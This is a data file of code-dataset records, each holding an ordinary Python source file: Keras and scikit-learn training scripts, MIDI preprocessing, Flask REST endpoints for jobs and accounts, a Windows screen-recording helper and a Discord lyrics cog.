+{"seq_id":"391216231","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/hammr/utils/scan_utils.py\n# Compiled at: 2016-12-15 07:34:25\nfrom texttable import Texttable\nfrom ussclicore.utils import generics_utils\n\ndef scan_status(scan):\n if scan.status.complete and not scan.status.error and not scan.status.cancelled:\n return 'Done'\n else:\n if not scan.status.complete and not scan.status.error and not scan.status.cancelled:\n return str(scan.status.percentage) + '%'\n return 'Error'\n\n\ndef scan_table(scanInstances, scan=None):\n table = Texttable(800)\n table.set_cols_dtype(['t', 't', 't', 't'])\n table.header(['Id', 'Name', 'Status', 'Distribution'])\n if scan:\n table.add_row([scan.dbId, '\\t' + scan.name, scan_status(scan), ''])\n return table\n for myScannedInstance in scanInstances:\n table.add_row([myScannedInstance.dbId, myScannedInstance.name, '', myScannedInstance.distribution.name + ' ' + myScannedInstance.distribution.version + ' ' + myScannedInstance.distribution.arch])\n scans = generics_utils.order_list_object_by(myScannedInstance.scans.scan, 'name')\n for lscan in scans:\n table.add_row([lscan.dbId, '\\t' + lscan.name, scan_status(lscan), ''])\n\n return table","sub_path":"pycfiles/hammr_3.6-1.1-py2.7/scan_utils.py","file_name":"scan_utils.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"295248022","text":"import numpy as np\nimport keras\nfrom sklearn import preprocessing\n\n#Clustering\n#Zoning - x > 2250\n#Directional data\n\n\nx = []\ny = []\nw = []\nh = []\n\nwith open(\"locations.txt\", \"r\") as f:\n\tfor line in f.readlines():\n\t\targs = line.split()\n\t\ty.append(args[0])\n\t\tx.append(args[1])\n\t\th.append(args[2])\n\t\tw.append(args[3])\n\n\n\nx = [float(i) for i in x]\nx = np.divide(x, 3840)\nx = [[int(index == int(i * 10)) for index in range(10)] for i in x]\ny = [float(i) for i in y]\ny = np.divide(y, 2160)\ny = [[int(index == int(i * 10)) for index in range(10)] for i in y]\nw = [float(i) for i in w]\nw = [[int(index == int(i * 10)) for index in range(10)] for i in w]\nh = [float(i) for i in h]\nh = [[int(index == int(i * 10)) for index in range(10)] for i in h]\n\n#print(x)\nlefti = []\nrighti = []\nlefth = []\nleftw = []\nrighth = []\nrightw = []\n\nfor i in range(len(x)):\n\tif x[i].index(1) < 5:\n\t\tlefti.append(x[i] + y[i])\n\t\tlefth.append(h[i])\n\t\tleftw.append(w[i])\n\telse:\n\t\trighti.append(x[i] + y[i])\n\t\trighth.append(h[i])\n\t\trightw.append(w[i])\nlefti = np.array(lefti)\nrighti = np.array(righti)\n#inputs = [x[i] + y[i] for i in range(len(x))]#[list(i) for i in zip(x, y)]\n#outputs = [w[i] + h[i] for i in range(len(x))]#[list(i) for i in zip(w, h)]\n#train_inputs = np.array(inputs[:])\n# train_outputs = np.array(outputs[:190])\n# print(train_outputs)\n# test_inputs = np.array(inputs[190:])\n# test_outputs = np.array(outputs[190:])\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(lefti, np.array(leftw), epochs=15, batch_size=1)\nmodel.save(\"lxlocator.h5\")\n\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(lefti, np.array(lefth), epochs=15, batch_size=1)\nmodel.save(\"lylocator.h5\")\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(righti, np.array(rightw), epochs=15, batch_size=2)\nmodel.save(\"rxlocator.h5\")\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Dense(units=10, activation='relu', input_dim = 20))\nmodel.add(keras.layers.Dense(units=10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(righti, np.array(righth), epochs=15, batch_size=2)\nmodel.save(\"rylocator.h5\")\n\n\n\n\n\n\n\n\n\n\n# print(model.evaluate(test_inputs, test_outputs))\n\n\n# print(model.predict(np.array([inputs[5]])))\n# print(outputs[5])\n\n\n\n","sub_path":"yolov3/basic_modeler.py","file_name":"basic_modeler.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"373162504","text":"import time\nimport os\nimport re\nfrom win32com.client import Dispatch\nimport configparser\nimport ctypes\nfrom xlat import Log\nfrom xlat import Config\n\n\ndef is_admin():\n try:\n return ctypes.windll.shell32.IsUserAnAdmin()\n except:\n return False\n\n\ndef start_record():\n Log.info(\"准备录屏\")\n if not hasattr(Config, \"record\") or Config.record is False:\n Log.info(\"配置未开启录屏,请先配置Config.record=True\")\n return\n if hasattr(Config, \"recording\") and Config.recording is True:\n Log.error(\"正在录屏,请先停止后再开启!!\")\n return\n if not hasattr(Config, \"record_config\"):\n Log.info(\"修改配置文件\")\n config_path = os.getenv(\"appdata\")+\"\\\\oCam\\\\Config.ini\"\n Log.info(\"配置文件路径:%s\"%config_path)\n cfg = configparser.ConfigParser()\n if os.path.exists(config_path):\n Log.info(\"配置文件存在\")\n cfg.read(config_path)\n cur = cfg.get(\"TfrmOption\", \"lbledtOutputPath\")\n Log.info('当前的存储目录:%s'%cur)\n if cur != Config.result_dir:\n cfg.set(\"TfrmOption\", \"lbledtOutputPath\", Config.result_dir)\n Log.info('新设置的存储目录:%s' %cfg.get(\"TfrmOption\", \"lbledtOutputPath\"))\n f = open(config_path, \"w\")\n cfg.write(f)\n f.close()\n Log.info(\"关闭录制程序进程\")\n os.popen(\"TASKKILL /F /IM oCam.exe\")\n time.sleep(2)\n else:\n Log.info(\"配置文件不存在,复制过去\")\n cfg.read(Config.root+\"\\\\data\\\\ocam\\\\Config.ini\")\n cfg.set(\"TfrmOption\", \"lbledtOutputPath\", Config.result_dir)\n Log.info('新设置的存储目录:%s' % cfg.get(\"TfrmOption\", \"lbledtOutputPath\"))\n os.makedirs(os.getenv(\"appdata\")+\"\\\\oCam\")\n f = open(config_path, \"w\")\n cfg.write(f)\n f.close()\n Log.info(\"关闭录制程序进程\")\n os.popen(\"TASKKILL /F /IM oCam.exe\")\n time.sleep(2)\n Config.record_config = True\n\n autoit = Dispatch(\"AutoItX3.Control\")\n if \"oCam.exe\" not in os.popen('tasklist /FI \"IMAGENAME eq oCam.exe\"').read():\n if not is_admin():\n Log.error(\"录屏需要管理员权限,请以管理员权限重新执行!!!\")\n return\n autoit.Run(Config.root + \"\\\\data\\\\ocam\\\\oCam.exe\")\n time.sleep(5)\n Config.record_list = os.listdir(Config.result_dir)\n autoit.Send(\"{F2}\")\n Log.info(\"开始录屏...\")\n Config.recording = True\n\n\ndef stop_record():\n if not hasattr(Config, \"recording\") or Config.recording is False:\n Log.error(\"没有在录屏,不能停止!!\")\n return\n autoit = Dispatch(\"AutoItX3.Control\")\n autoit.Send(\"{F2}\")\n time.sleep(2)\n Log.info(\"结束录屏...\")\n Config.recording = False\n Config.record_list.sort()\n Log.info(Config.record_list)\n newfile = []\n i = 0\n while i < 5:\n new_list = os.listdir(Config.result_dir)\n new_list.sort()\n Log.info(new_list)\n for file in new_list:\n if file not in Config.record_list and re.match(\"录制_\\d{4}_\\d{2}_\\d{2}_\\d{2}_\\d{2}_\\d{2}_\\d{1,3}.mp4\",file):\n newfile.append(file)\n Log.info(newfile)\n if len(newfile) > 0:\n break\n i += 1\n time.sleep(1)\n if len(newfile) == 0:\n Log.error(\"没有新文件产生,录制失败\")\n return\n if len(newfile) >= 2:\n Log.error(\"录制生成两个以上的视频,只取第一个\")\n filepath = Config.result_dir+\"\\\\\"+newfile[0]\n Log.info(\"录制成功,文件保存在:\" + filepath + '播放 ')\n\n\nif __name__ == '__main__':\n Config.record = True\n start_record()\n time.sleep(5)\n stop_record()\n start_record()\n time.sleep(5)\n stop_record()\n","sub_path":"common/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"487528723","text":"# For data preprocessing, we just used the codes provided by Daniel Johnson here: https://github.com/hexahedria/biaxial-rnn-music-composition/blob/master/data.py\n\nimport itertools\nimport os\nimport random\nimport sys\n\nfrom cache import Cache\nfrom midi_to_statematrix import *\n\n\ndef startSentinel():\n def noteSentinel(note):\n position = note\n part_position = [position]\n\n pitchclass = (note + lowerBound) % 12\n part_pitchclass = [int(i == pitchclass) for i in range(12)]\n\n return part_position + part_pitchclass + [0] * 66 + [1]\n\n return [noteSentinel(note) for note in range(upperBound - lowerBound)]\n\n\ndef getOrDefault(l, i, d):\n try:\n return l[i]\n except IndexError:\n return d\n\n\ndef buildContext(state):\n context = [0] * 12\n for note, notestate in enumerate(state):\n if notestate[0] == 1:\n pitchclass = (note + lowerBound) % 12\n context[pitchclass] += 1\n return context\n\n\ndef buildBeat(time):\n return [2 * x - 1 for x in [time % 2, (time // 2) % 2, (time // 4) % 2, (time // 8) % 2]]\n\n\ndef noteInputForm(note, state, context, beat):\n position = note\n part_position = [position]\n\n pitchclass = (note + lowerBound) % 12\n part_pitchclass = [int(i == pitchclass) for i in range(12)]\n part_prev_vicinity = list(\n itertools.chain.from_iterable((getOrDefault(state, note + i, [0, 0]) for i in range(-12, 13))))\n\n part_context = context[pitchclass:] + context[:pitchclass]\n\n return part_position + part_pitchclass + part_prev_vicinity + part_context + beat + [0]\n\n\ndef noteStateSingleToInputForm(state, time):\n beat = buildBeat(time)\n context = buildContext(state)\n return [noteInputForm(note, state, context, beat) for note in range(len(state))]\n\n\ndef noteStateMatrixToInputForm(statematrix):\n inputform = np.int8([noteStateSingleToInputForm(state, time) for time, state in enumerate(statematrix)])\n return inputform\n\ndef getpices(path='midis', midi_len=128, mode='all',composer=None):\n pieces = {}\n if not os.path.exists(path):\n # Download midi files\n import midi_scraper\n song_count = 0\n\n for composer_name in os.listdir(path):\n if composer is not None and composer_name not in composer: continue\n for fname in os.listdir(path+'/'+composer_name):\n if fname[-4:] not in ('.mid','.MID'):\n continue\n\n name = fname[:-4]\n\n outMatrix = midiToNoteStateMatrix(os.path.join(path, composer_name, fname))\n if len(outMatrix) < midi_len:\n continue\n\n pieces[name] = np.int8(outMatrix)\n song_count += 1\n print (\"Loaded {}-{}\".format(composer_name, fname))\n if mode != 'all':\n if song_count >= 10:\n print (\"{} songs are loaded\".format(song_count))\n return pieces\n print (\"{} songs are loaded\".format(song_count))\n return pieces\n\ndef getPieceSegmentFaulty(pieces, piece_length=128, measure_len=16, validation=False):\n # piece_length means the number of ticks in a training sample, measure_len means number of ticks in a measure\n val_size = len(pieces) // 5\n if validation:\n pieces_set = pieces[-val_size:]\n else:\n pieces_set = pieces[:-val_size]\n piece_name, full_length = random.choice(pieces)\n\n # We just need a segment of a piece as train data, and we want the start of a sample is the start of a measure\n start = random.randrange(0, full_length-piece_length,measure_len)\n\n seg_in, seg_out = cache.get(piece_name, start, start+piece_length)\n\n return seg_in, seg_out\n\ndef generate_batch(cache, batch_size, piece_length=128):\n while True:\n i,o = zip(*[getPieceSegment(cache, piece_length) for _ in range(batch_size)])\n 
yield(i,o)\n\ndef generate_val_batch(cache, batch_size, piece_length=128):\n    while True:\n        i,o = zip(*[getPieceSegment(cache, piece_length,validation=True) for _ in range(batch_size)])\n        yield(i,o)\n\ndef getPieceSegment(cache, piece_length=128, measure_len=16, validation=False):\n    # piece_length means the number of ticks in a training sample, measure_len means number of ticks in a measure\n    val_size = max(cache.size // 10, 1)\n    if validation:\n        keys_and_lengths = cache.keys_and_lengths[-val_size:]\n    else:\n        keys_and_lengths = cache.keys_and_lengths[:-val_size]\n    piece_name, full_length = random.choice(keys_and_lengths)\n\n    # We just need a segment of a piece as train data, and we want the start of a sample to be the start of a measure\n    start = random.randrange(0, full_length-piece_length,measure_len)\n\n    seg_in, seg_out = cache.get(piece_name, start, start+piece_length)\n\n    return seg_in, seg_out\n\n\ndef initialize_cache(pieces, piece_length=128, measure_len=16, save_loc=\"cache.pkl\"):\n    midi_cache = Cache()\n    for piece_name in pieces:\n        out_matrix = pieces[piece_name]\n        print(out_matrix.shape)\n        in_matrix = noteStateMatrixToInputForm(out_matrix)\n        midi_cache.cache(in_matrix, out_matrix, piece_name)\n\n    print(\"Cache initialized with {} pieces; total size is {} bytes\".format(len(pieces), midi_cache.byte_size))\n    midi_cache.shuffle_piece()\n    midi_cache.save(save_loc=save_loc)\n    return midi_cache\n\n\ndef translate(note_matrix, direction=\"up\"):\n    \"\"\"\n    Translate the notes in a piece up or down one note to test invariance.\n    Preprocess the note_matrix to mute the highest and lowest note.\n    \"\"\"\n    translated_matrix = []\n\n    # If we translate upwards, the highest note falls off\n    # If we translate down, the lowest note falls off\n    dropped_idx = 0\n    if direction == \"up\":\n        dropped_idx = -1\n\n    for step_notes in note_matrix:\n        # Each step_notes is a (78 x 2)\n        if direction == \"up\":\n            translated_matrix.append([[0, 0]] + [pair for pair in step_notes[0:-1]])\n        else:\n            translated_matrix.append([pair for pair in step_notes[1:]] + [[0, 0]])\n\n    return translated_matrix\n\ndef translate_np(note_matrix, shift=1, direction=\"up\"):\n    \"\"\"\n    Translate the notes in a piece up or down one note to test invariance.\n    Preprocess the note_matrix to mute the highest and lowest note.\n    \"\"\"\n    if direction == \"down\":\n        shift = shift * -1\n    translated_matrix = np.roll(note_matrix, shift, axis=-2)\n    return translated_matrix\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
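translate_np relies on numpy's roll along the note axis; a quick self-contained check of that behavior on a toy matrix (toy shapes, not the 78-note statematrix) also shows where it differs from the list-based translate above:

```python
import numpy as np

# A toy "statematrix": 4 time steps x 6 notes x 2 flags (played, articulated).
m = np.zeros((4, 6, 2), dtype=np.int8)
m[:, 2, 0] = 1  # note index 2 is held through the piece

up = np.roll(m, 1, axis=-2)     # shift "up": note 2 moves to index 3
down = np.roll(m, -1, axis=-2)  # shift "down": note 2 moves to index 1

assert up[:, 3, 0].all() and down[:, 1, 0].all()
print(up.shape)  # (4, 6, 2) -- shape is preserved

# Caveat: np.roll wraps around, so the top note reappears at the bottom;
# the list-based translate() zero-fills the vacated row instead of wrapping.
```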
+{"seq_id":"146326653","text":"import flask\nfrom data import db_session\nfrom data.jobs import Jobs\nfrom flask import jsonify, request\nfrom datetime import datetime, timedelta\n\nblueprint = flask.Blueprint('jobs_api', __name__,\n template_folder='templates')\n\n\n@blueprint.route('/api/jobs')\ndef get_jobs():\n session = db_session.create_session()\n jobs = session.query(Jobs).all()\n return jsonify(\n {\n 'jobs':\n [item.to_dict()\n for item in jobs]\n }\n )\n\n\n@blueprint.route('/api/jobs/', methods=['GET'])\ndef get_one_news(jobs_id):\n session = db_session.create_session()\n jobs = session.query(Jobs).get(jobs_id)\n if not jobs:\n return jsonify({'error': 'Not found'})\n return jsonify(\n {\n 'jobs': jobs.to_dict(only=('team_leader', 'job', 'work_size', 'collaborators', 'is_finished', 'user.nam'))\n }\n )\n\n\n@blueprint.route('/api/jobs', methods=['POST'])\ndef create_jobs():\n if not request.json:\n return jsonify({'error': 'Empty request'})\n elif not all(key in request.json for key in\n ['job', 'team_leader', 'work_size', 'collaborators',\n 'is_finished']):\n print(request.json)\n return jsonify({'error': 'Bad request'})\n session = db_session.create_session()\n if session.query(Jobs).filter(Jobs.id == request.json['id']).first():\n return jsonify(({'error': 'Id already exists'}))\n jobs = Jobs(\n id=request.json['id'],\n job=request.json['job'],\n team_leader=request.json['team_leader'],\n work_size=request.json['work_size'],\n collaborators=request.json['collaborators'],\n start_date=datetime.now(),\n end_date=datetime.now() + timedelta(request.json['work_size']),\n is_finished=request.json['is_finished']\n )\n if session.query(Jobs).filter(Jobs.id == jobs.id).first():\n return jsonify({'error': 'Id already exists'})\n session.add(jobs)\n session.commit()\n return jsonify({'success': 'OK'})\n\n\n@blueprint.route('/api/jobs/', methods=['DELETE'])\ndef delete_jobs(jobs_id):\n session = db_session.create_session()\n jobs = session.query(Jobs).get(jobs_id)\n if not jobs:\n return jsonify({'error': 'Not found'})\n session.delete(jobs)\n session.commit()\n return jsonify({'success': 'OK'})\n\n\n@blueprint.route('/api/jobs/', methods=['PUT'])\ndef edit_jobs(id):\n if not request.json:\n return jsonify({'error': 'Empty request'})\n session = db_session.create_session()\n jobs = session.query(Jobs).filter(Jobs.id == id).first()\n if jobs:\n k = ['job', 'team_leader', 'work_size', 'collaborators',\n 'start_date', 'end_date', 'is_finished']\n for key in k:\n if key in request.json:\n if key == 'job':\n jobs.job = request.json[key]\n if key == 'team_leader':\n jobs.team_leader = request.json[key]\n if key == 'work_size':\n jobs.work_size = request.json[key]\n if key == 'collaborators':\n jobs.collaborators = request.json[key]\n if key == 'start_date':\n jobs.start_date = request.json[key]\n if key == 'end_date':\n jobs.end_date = request.json[key]\n if key == 'is_finished':\n jobs.is_finished = request.json[key]\n session.commit()\n return jsonify({'success': 'OK'})\n else:\n return jsonify({'error': 'Bad request'})\n\n","sub_path":"restapi/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"66127770","text":"from asyncio import create_task\nfrom asyncio.exceptions import TimeoutError as Te\nfrom typing import Literal\n\nimport discord\nimport ksoftapi\nfrom redbot.core import commands\nfrom redbot.core.utils.chat_formatting import bold, humanize_list, pagify\nfrom redbot.core.utils.menus import DEFAULT_CONTROLS, menu\nfrom redbot.core.utils.predicates import MessagePredicate\n\nBASE_URL = \"https://api.ksoft.si/lyrics/search\"\n\n\nclass Lyrics(commands.Cog):\n\n __author__ = [\"Predeactor\"]\n __version__ = \"v1\"\n\n def __init__(self, bot, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.bot = bot\n self.client = None\n\n def format_help_for_context(self, ctx: commands.Context) -> str:\n \"\"\"Thanks Sinbad!\"\"\"\n pre_processed = super().format_help_for_context(ctx)\n return (\n \"{pre_processed}\\n\\nAuthor: {authors}\\nCog Version: {version}\\nThe cog is in beta \"\n \"and may be subect to unwanted behavior.\".format(\n pre_processed=pre_processed,\n authors=humanize_list(self.__author__),\n version=self.__version__,\n )\n )\n\n async def red_delete_data_for_user(\n self,\n *,\n requester: Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"],\n user_id: int,\n ):\n \"\"\"\n Nothing to delete...\n \"\"\"\n pass\n\n @commands.command(alias=[\"lyric\"])\n @commands.bot_has_permissions(embed_links=True)\n @commands.max_concurrency(1, commands.BucketType.user, wait=False)\n async def lyrics(self, ctx: commands.Context, *, song_name: str):\n \"\"\"Return the lyrics of a given music/song name.\n\n Powered by KSoft.Si.\n \"\"\"\n try:\n client = await self.obtain_client()\n except AttributeError:\n await ctx.send(\"Not key for KSoft.Si has been set, ask owner to add a key.\")\n return\n try:\n music_lyrics = await client.music.lyrics(song_name)\n except ksoftapi.NoResults:\n await ctx.send(\"No lyrics were found for your music.\")\n return\n message, available_musics = await self._title_choose(music_lyrics)\n await ctx.maybe_send_embed(message)\n predicator = MessagePredicate.less(10, ctx)\n try:\n user_message = await self.bot.wait_for(\"message\", check=predicator, timeout=60)\n except Te:\n await ctx.send(\"It's so silent on the outside...\")\n return\n\n choosen_music = user_message.content\n if choosen_music not in available_musics:\n await ctx.send(\n \"I was unable to find the corresponding music in the available music list.\"\n )\n return\n music = available_musics[choosen_music]\n embeds = []\n embed = discord.Embed(color=await ctx.embed_color(), title=music.name, description=None)\n embed.set_thumbnail(url=music.album_art)\n embed.set_footer(text=\"Powered by KSoft.Si.\", icon_url=ctx.author.avatar_url)\n for text in pagify(music.lyrics):\n embed.description = text\n embeds.append(embed)\n create_task(menu(ctx, embeds, DEFAULT_CONTROLS)) # No await since max_concurrency is here\n\n @staticmethod\n async def _title_choose(list_of_music: list):\n \"\"\"Function to return for requesting user's prompt, asking what music to choose.\n\n Parameter:\n - list_of_music: A list containing musics.\n\n Returns:\n A tuple with:\n - str: A list with musics name and their corresponding number.\n - dict: A list with the music according his number in the message.\n \"\"\"\n message = \"Please select the music you wish to get the lyrics by selecting the corresponding number:\\n\\n\"\n method = {}\n n = 0\n for music in list_of_music:\n if not isinstance(music, ksoftapi.models.LyricResult):\n continue # Not a music\n year = 
music.album_year[0] if music.album_year else \"\"\n            message += \"`{number}` - {title} by {author} {year}\\n\".format(\n                number=n,\n                title=music.name,\n                author=music.artist,\n                year=\"(\" + bold(year) + \")\" if year else \"\",\n            )\n            method[str(n)] = music\n            n += 1\n        return message, method\n\n    async def obtain_client(self):\n        \"\"\"Get a client and put it in self.client (for caching).\n\n        Return:\n        ksoftapi.Client: Client to use.\n        \"\"\"\n        if self.client:\n            return self.client\n        keys = await self.bot.get_shared_api_tokens(\"ksoftsi\")\n        if keys.get(\"api_key\"):\n            self.client = ksoftapi.Client(keys.get(\"api_key\"))\n            return self.client\n        raise AttributeError(\"API key is not set.\")  # raise (not return) so the caller's except clause fires\n\n    @staticmethod\n    async def __session_closer(client):\n        await client.close()\n\n    def cog_unload(self):\n        if self.client:\n            create_task(self.__session_closer(self.client))\n","sub_path":"lyrics/lyrics.py","file_name":"lyrics.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
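obtain_client must raise the AttributeError rather than return it, or the caller's `except AttributeError:` never fires; a tiny demonstration of the difference:

```python
def returns_error():
    return AttributeError("not set")  # just returns a value; nothing is raised

def raises_error():
    raise AttributeError("not set")

try:
    client = returns_error()
except AttributeError:
    print("never reached")  # the exception object was merely returned
print(isinstance(client, AttributeError))  # True: caller got an exception *object*

try:
    raises_error()
except AttributeError as exc:
    print("caught:", exc)  # caught: not set
```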
+{"seq_id":"246313259","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nfrom time import time\r\nimport logging\r\n\r\n# Display progress logs on stdout\r\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s')\r\n\r\nsys.path.append(\"../DatasetProcessing\")\r\nfrom vectorize_split_dataset import preprocess\r\n\r\nfeatures_train, features_test, labels_train, labels_test = preprocess()\r\n\r\n#########################################################\r\n### your code goes here ###\r\n#peanlty='l2' - depends on datasize\r\n#dual=True when n_samples > n_features\r\n#C=1e5 Inverse of regularization strength, smaller values specify stronger regularization\r\n#fit_intercept=False Specifies if a constant should be added to the decision function\r\n#intercept_scaling=5 solver is liblinear. when self.fit_intercept is True, instance vector x becomes [x, self.intercept_scaling]\r\n#class_weight='balanced'\r\n#max_iter=100 Maximum number of iterations taken for the solvers to converge\r\n#random_state=42 The seed of the pseudo random number generator to use when shuffling the data\r\n#solver : {‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’} Algorithm to use in the optimization problem\r\n#n_jobs=-1 Number of CPU cores used during the cross-validation loop. If given a value of -1, all cores are used\r\n#verbose=1 For the liblinear and lbfgs solvers set verbose to any positive number for verbosity\r\nweight = {'0':7, '1':3}\r\n#Optimum: penalty='l2',class_weight=weight\r\n\r\nfrom sklearn import linear_model\r\nclf = linear_model.LogisticRegression(penalty='l2', C=1e5, verbose=1 ,n_jobs=-1)\r\n#clf = linear_model.LogisticRegression(penalty='l1')\r\n#clf = linear_model.LogisticRegressionCV()\r\nt0 = time()\r\nclf.fit(features_train, labels_train)\r\npred = clf.predict(features_test)\r\nprint(\"training time:\", round(time()-t0, 3), \"s\")\r\n\r\nfrom sklearn.metrics import classification_report\r\ny_true = labels_test\r\ny_pred = pred\r\n#print(len(y_pred))\r\nlabels = ['0','1']\r\ntarget_names = ['class 0', 'class 1']\r\nprint(classification_report(y_true, y_pred, target_names=target_names, labels=labels))\r\nprint(\"------------------------------------------------------\")\r\n\r\n##Printing Metrics for Training and Testing\r\nprint(\"------------------------------------------------------\")\r\nprint(\"No. of Testing Features:\"+str(len(features_test)))\r\nprint(\"No. of Testing Features Label:\"+str(len(labels_test)))\r\nprint(\"No. of Training Features:\"+str(len(features_train)))\r\nprint(\"No. of Training Features Label:\"+str(len(labels_train)))\r\nprint(\"No. 
of Predicted Features:\"+str(len(pred)))\r\nprint(\"------------------------------------------------------\")\r\n\r\n\r\n##Getting feature data\r\n#importances = clf.feature_importances_\r\n#most_important = importances.argmax()\r\n#print(most_important)\r\n#print([(feature,key) for key,feature in enumerate(clf.feature_importances_) if feature >= 0.2])\r\n\r\n\r\n#############################################################\r\n#### Saving model METHOD 2###\r\n#from sklearn.externals import joblib\r\n#model_file = \"./createdModel/maxEntModel.pkl\"\r\n#joblib.dump(clf, model_file)\r\n#print(\"classifier saved!!!!!!\")\r\n#clf1 = joblib.load(model_file)\r\n#print(\"classifier loaded!!!!!\")\r\n#pred = clf.predict(features_test)\r\n#print(clf.score(features_test, labels_test))\r\n\r\n##Calculating Classifier Performance Metrics\r\nfrom sklearn.metrics import classification_report\r\ny_true = labels_test\r\ny_pred = pred\r\nlabels = ['0','1']\r\ntarget_names = ['class 0', 'class 1']\r\nprint(classification_report(y_true, y_pred, target_names=target_names, labels=labels))\r\nprint(\"------------------------------------------------------\")\r\n\r\nfrom vectorize_split_dataset import preprocessLine\r\narrayTest = []\r\n\r\ninputPath=\"../ValidationData/validate_start.txt\"\r\noutputPath=\"../ValidationData/validate_completed.txt\"\r\nprint(\"Labelling Data\")\r\n##Opening Text file\r\noutput_file = open(outputPath, \"w\")\r\nfp = open(inputPath, 'r')\r\n# Iterate over the file object directly; the old readline() priming loop skipped the first line\r\nfor line in fp:\r\n    pLine = line.strip()\r\n    if(pLine != \"\"):\r\n        del arrayTest[:]\r\n        arrayTest.append(pLine)\r\n        features_tobelabelled = preprocessLine(arrayTest)\r\n        producedLabel = clf.predict(features_tobelabelled)[0]\r\n        #print(producedLabel)\r\n        print(producedLabel+\"\\t\"+pLine)\r\n        output_file.write(producedLabel+\"\\t\"+pLine+\"\\n\")\r\n        #text_file.write(\"$$$$$\\n\")\r\n#end loop\r\nfp.close()\r\noutput_file.close()","sub_path":"RCAAnalysis1/Algorithms/ME1.py","file_name":"ME1.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
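The original labelling loop primed readline() before the while and read again at the top of the body, which silently drops the first line of the validation file; a short comparison of the broken and fixed patterns on a toy in-memory file:

```python
import io

data = io.StringIO("first\nsecond\nthird\n")

# Broken: the priming read is overwritten before it is ever processed.
line = data.readline()
seen = []
while line:
    line = data.readline()  # clobbers "first" before it is used
    if line.strip():
        seen.append(line.strip())
print(seen)  # ['second', 'third']

# Fixed: iterate the file object directly.
data.seek(0)
print([l.strip() for l in data if l.strip()])  # ['first', 'second', 'third']
```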
+{"seq_id":"345513938","text":"from http import HTTPStatus\n\nfrom flask import request\nfrom flask_restful import Resource\n\nfrom project.extensions import mysql_db\n\n\nclass Accounts(Resource):\n @staticmethod\n def post():\n req = request.get_json()\n sql = \"INSERT INTO accounts (first_name, last_name, birth_date, biography, picture_id, email) VALUES (%s, %s, %s, %s, %s, %s)\"\n val = (req.get(\"first_name\"),\n req.get(\"last_name\"),\n req.get(\"birth_date\"),\n req.get(\"biography\"),\n req.get(\"picture_id\"),\n req.get(\"email\"))\n mycursor = mysql_db.cursor()\n mycursor.execute(sql, val)\n mysql_db.commit()\n return {'message': \"Account created successfully\"}, HTTPStatus.NO_CONTENT\n\n @staticmethod\n def get(account_id):\n mycursor = mysql_db.cursor()\n\n val = tuple(account_id)\n mycursor.execute(\"select * from accounts where id = %s\", val)\n result = mycursor.fetchone()\n\n return {\"result\": {\n \"id\": result[0],\n \"first_name\": result[1],\n \"last_name\": result[2],\n \"birth_date\": str(result[3]),\n \"biography\": result[4],\n \"picture_id\": result[5],\n \"email\": result[6],\n }}, HTTPStatus.OK\n\n @staticmethod\n def put(account_id):\n mycursor = mysql_db.cursor()\n\n req = request.get_json()\n val = (req.get(\"first_name\"),\n req.get(\"last_name\"),\n req.get(\"birth_date\"),\n req.get(\"biography\"),\n req.get(\"picture_id\"),\n req.get(\"email\"),\n account_id)\n sql = \"UPDATE accounts set first_name = %s, last_name = %s, birth_date = %s, biography = %s, picture_id = %s, email = %s where id = %s\"\n mycursor.execute(sql, val)\n\n mysql_db.commit()\n return {\"message\": \"account successfully updated\"}, HTTPStatus.NO_CONTENT\n","sub_path":"project/controllers/v1/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
